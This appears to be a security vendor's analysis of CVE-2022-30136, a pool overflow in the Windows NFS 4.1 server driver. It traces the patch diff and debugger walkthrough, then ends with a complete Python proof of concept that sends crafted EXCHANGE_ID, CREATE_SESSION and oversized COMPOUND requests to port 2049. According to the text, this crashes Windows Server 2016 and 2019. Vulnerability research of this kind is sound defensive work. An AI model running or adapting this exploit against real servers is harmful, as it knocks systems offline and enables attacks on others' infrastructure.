Analysis of CVE-2022-30136 “Windows Network File System Vulnerability“
I wanted to write this article to demonstrate the analysis I did while developing the Core Impact exploit “Windows Network File System Remote” that abuses the CVE-2022-30136 vulnerability.
1)The Vulnerability
The Windows Network File System Remote Code Execution vulnerability is a size calculation error that occurs when creating the server response in a COMPOUND REQUEST using version 4.1 of NFS.
The server calculates a smaller size than necessary to allocate the pool, and then, when copying the data to generate the response, overflows the buffer.
The function Nfs4SvrXdrpGetEncodeOperationResultByteCount in nfssvr.sys is called for each operation and returns a size that is smaller than necessary (4 bytes less for each operation).
2)The Patch
A patch was made for Nfs4SvrXdrpGetEncodeOperationResultByteCount.
This function is called during each OPERATION of a COMPOSE REQUEST so that it returns the bytes needed for each of them based on the OPCODE. It is then added to the header and other parts of the response. Next, it calculates the final size of the entire response to allocate and then copies on it to reply.
In each case, we can see that the value of the size returned for each operation is four bytes smaller in the vulnerable version than the patched version.
3)The Diff
I built this POC for Windows server 2019.
Below is the vulnerable version of nfssvr.sys used for this POC, followed by the patched version for Windows server 2019:
The next image shows CASE 26 in the diff:
In the example of CASE 26, we can see that the constant added to the calculated value is 0x2c in the vulnerable version, and 0x30 in the patched version.
The same can be seen in each case corresponding to each OPCODE. The vulnerable one always returns a size four bytes smaller than the patched one.
We are not going to show all the cases because the patch is similar for all OPCODES.
4) Usage of the Miscalculated Value
The parent of Nfs4SvrXdrpGetEncodeOperationResultByteCount is Nfs4SvrXdrEncodeCompoundResults. It reads the number of operations sent in the COMPOUND REQUEST.
In this POC the value is 0x34 (52d). When my POC connects to the server to the port 2049 (the default port to NFS), I need to place a conditional breakpoint for a stop.
In this instance, it stops when number_of_operations=0x34.
The pool with tag ARGS is allocated here.
I will then create a structure named TAG_ARGS_0x10e0 to reverse the fields.
It copies the number_of_operations into r13 and loops into the vulnerable function once per operation, until the counter reaches the value of r13.
It shows that the first package_OPCODE= 0x35, which corresponds to SEQUENCE in the first mandatory operation in a COMPOUND REQUEST. In the image below, the arrow points to this OPCODE in my package.
Here we can see the arguments of the vulnerable function.
Inside the vulnerable function it reads the OPCODE and goes to the corresponding CASE.
Three is subtracted from the original OPCODE value (53).
And jumps to CASE 50, returning 0x28 to the necessary size for this operation.
We can see in the diff how the patched version returns 0x2c.
This returned value is added to the previous value of other fields in the response in order to calculate the size of the operations. In this case, this value is 0X40c.
Below we can see the values being added:
When it exits the loop, the total size is calculated. In this case, the total size is 0x1310.
We can guess the difference between the vulnerable version and the patched version by calculating the size, using the formula: number_of_operations * 4.
In this case the allocation in the patched version will be 0x34 * 4 = 0x68 bigger than the vulnerable version.
After that it adds 0x24. This value is calculated in similar way in both vulnerable and patched versions.
It then adds the constant 0xf in both cases.
Up to this point, the size in this example has been 0x1340.
Next it reaches rpcxdr_OncRpcBufMgrpAllocate.
It then moves to r15.
It subtracts one and adds four. It then compares with 0x800.
This miscalculated size is only used if it is bigger than 0x800. For this reason, only a COMPOUND REQUEST will trigger the bug.
First it allocates a pool with the size = 0x80 and the tag XdBD.
Finally, it allocates the pool for the reply here with the size 0x1398, which adds some constant values.
It then allocates 0x13a0 (including tag XdBP and header).
From there, it stores the address of the new allocated pool in the field: tag_XdBD_0x80.p_TAG_XDBP_0x13a0.
This points to the address of the reply it is always copying to.
Then it will start to build the reply header.
The following is an example of how it saves the data to the contain of a temporal pointer and adds four to it.
Below we can see how it copies to the contents of the reply address.
This writes the first dword and it increases the pointer by four.
Next it writes the second dword and adds four.
After exiting the function, the entire header is written.
After that It returns to nfssvr.sys to continue writing the reply.
It will continue decoding and writing in the reply, adding four to the temporal pointer.
When it completes the header, it reaches this loop to write all operations. It begins with the first OPCODE 0x35.
We can see it writes 0x428 from the start of the pool.
Now it points after the tag.
By putting a breakpoint here, we can see how all the operations were written.
After exiting the loop all operations are copied.
Let’s check the end of the pool.
There we can see the write after the limit.
The allocation is smaller than the data copied, producing a pool overflow.
This produces a BSOD in the target machine. However, the question is, can we achieve a Remote Code execution, or a Write what where?
I tried a number of opcode combinations to get a reply with a controlled data in the overflowed bytes. Unfortunately, I had no luck.
The maximum tag (controlled by me) only can be placed at the start and has a 0x400 maximum size.
All the other opcodes I tried do not reply with controlled data. Consequently, I don’t think it’s possible or, at the very least, is incredibly difficult get a RCE or elevate privileges with this bug. That said, it may still be possible, as I did not try all the combinations among the great number of possibilities that exist.
5) The Build of the POC
For the build of the POC I tried with a client named “NFS CLIENT.” It supports NFS 4.1 and I was able to try different opcodes copying files, editing, creating folders etc.
In this build, I could make a COMPOUND sample package and adjust the size, the client id, the session id etc.
Next, I sent an EXCHANGE_ID to get the client id, using it to send a CREATE_SESSION and finally the big COMPOUND REQUEST.
6)The POC
This PoC was tested on Windows servers 2016 and 2019. It produces a BSOD. For ease of use, it is available on google drive (password=poc), as is the pcap file(password=pcap).
import socket import sys import binascii import time import struct TARGET_IP = "192.168.126.130" port=2049 TEST_MSG = b"\x80\x00\x00\x4c\x00\x00\x00\x01\x00\x00" \ b"\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa3\x00\x00\x00\x04\x00\x00" \ b"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x24\xda\x44\xd1\x44\x00\x00" \ b"\x00\x0f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x32\x36\x2e\x31\x33" \ b"\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock1.connect((TARGET_IP, port)) sock1.send(bytes(TEST_MSG)) sock1.settimeout(1.0) print("[+] Sent TestMSG for Async Call") TEST_MSG=b"\x80\x00\x00\xc4\x00\x00\x00\x02\x00\x00" \ b"\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa3\x00\x00\x00\x04\x00\x00" \ b"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x24\xda\x44\xd5\xd0\x00\x00" \ b"\x00\x0f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x32\x36\x2e\x31\x33" \ b"\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" \ b"\x00\x01\x00\x00\x00\x2a\x00\x00\x00\x00\x62\xb3\x09\x00\x00\x00" \ b"\x00\x24\x37\x37\x35\x39\x62\x33\x31\x38\x2d\x32\x62\x65\x30\x2d" \ b"\x34\x30\x35\x65\x2d\x61\x66\x64\x38\x2d\x66\x66\x64\x62\x32\x35" \ b"\x38\x65\x64\x35\x34\x35\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00" \ b"\x00\x01\x00\x00\x00\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x00" \ b"\x00\x00\x00\x00\x00\x0b\x4e\x46\x53\x20\x43\x6c\x69\x65\x6e\x74" \ b"\x20\x00\x00\x00\x00\x00\x62\xb3\x09\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00" a=b"" sock1.send(bytes(TEST_MSG)) for i in range (4): try: a+=sock1.recv(1024) except: pass index=a.find(b"\x2a") print ("INDEX %s"%index) clientid=a[index+5:index+13] print("CLIENTID = %s"%clientid) seqid=a[index+13:index+13+4] #seqid = b'\x00\x00\x00\x01' print("SEQID = %s"%seqid) TEST_MSG=b"\x80\x00\x00\xd4\x00\x00\x00\x03\x00\x00" \ b"\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa3\x00\x00\x00\x04\x00\x00" \ b"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x24\xda\x4f\x96\x8c\x00\x00" \ b"\x00\x0f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x32\x36\x2e\x31\x33" \ b"\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" \ b"\x00\x01\x00\x00\x00\x2b"+ clientid+ seqid+ \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x04\x14\x00\x10" \ b"\x03\x88\x00\x00\x0b\x34\x00\x00\x00\x50\x00\x00\x00\x80\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x40\x00" \ b"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x3e\x4a\xf4\xb9\x00\x00" \ b"\x00\x0f\x44\x45\x53\x4b\x54\x4f\x50\x2d\x47\x43\x45\x36\x4f\x49" \ b"\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ #b"\x00\x00" sock1.send(bytes(TEST_MSG)) a=b"" for i in range (4): try: a+=sock1.recv(1024) except: pass index=a.find(b"\x2b") print ("INDEX %s"%index) session=a[index+5:index+5+16] print("SESSION = %s"%session) seqid = b'\x00\x00\x00\x01' STRING2= 0x400 * b"B" strlargo2=struct.pack(">L",len(STRING2)) pad= strlargo2 + STRING2 STRING3= 0x10 * b"A" strlargo3=struct.pack(">L",len(STRING3)) pad3= strlargo3 + STRING3 print("pad3 = %r"%pad3) num=50 oper= struct.pack(">L",2+num) TEST_MSG2=b"\x00\x00\x00\x04\x00\x00" \ b"\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa3\x00\x00\x00\x04\x00\x00" \ b"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x24\xda\x57\x45\xf3"+ pad3 + b"\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00" + pad3 + pad + b"\x00\x00\x00\x01" + oper +\ b"\x00\x00\x00\x35" + session+ seqid+ b"\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18" TEST_MSG =b"\x00\x00\x00\x2a\x00\x00\x00\x00\x62\xb3\x09\x00\x00\x00" \ b"\x00\x24\x37\x37\x35\x39\x62\x33\x31\x38\x2d\x32\x62\x65\x30\x2d" \ b"\x34\x30\x35\x65\x2d\x61\x66\x64\x38\x2d\x66\x66\x64\x62\x32\x35" \ b"\x38\x65\x64\x35\x34\x35\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00" \ b"\x00\x01\x00\x00\x00\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x00" \ b"\x00\x00\x00\x00\x00\x0b\x4e\x46\x53\x20\x43\x6c\x69\x65\x6e\x74" \ b"\x20\x00\x00\x00\x00\x00\x62\xb3\x09\x00\x00\x00" \ b"\x00\x00" TEST_MSG= TEST_MSG * num final= b"\x00"* 0x4 largo=len(TEST_MSG2+TEST_MSG+final) TEST_MSG1= b"\x80\x00"+ struct.pack(">h", largo) print("LENGTH = " + hex(largo)) print("Bytelength = %r"%TEST_MSG1) sock1.send(bytes(TEST_MSG1+TEST_MSG2+TEST_MSG+final)) time.sleep(5)
Explore Other Core Impact Exploits
Core Impact provides up-to-date exploits they need in one place in a robust library designed to enable pen testers to safely and efficiently conduct successful penetration tests.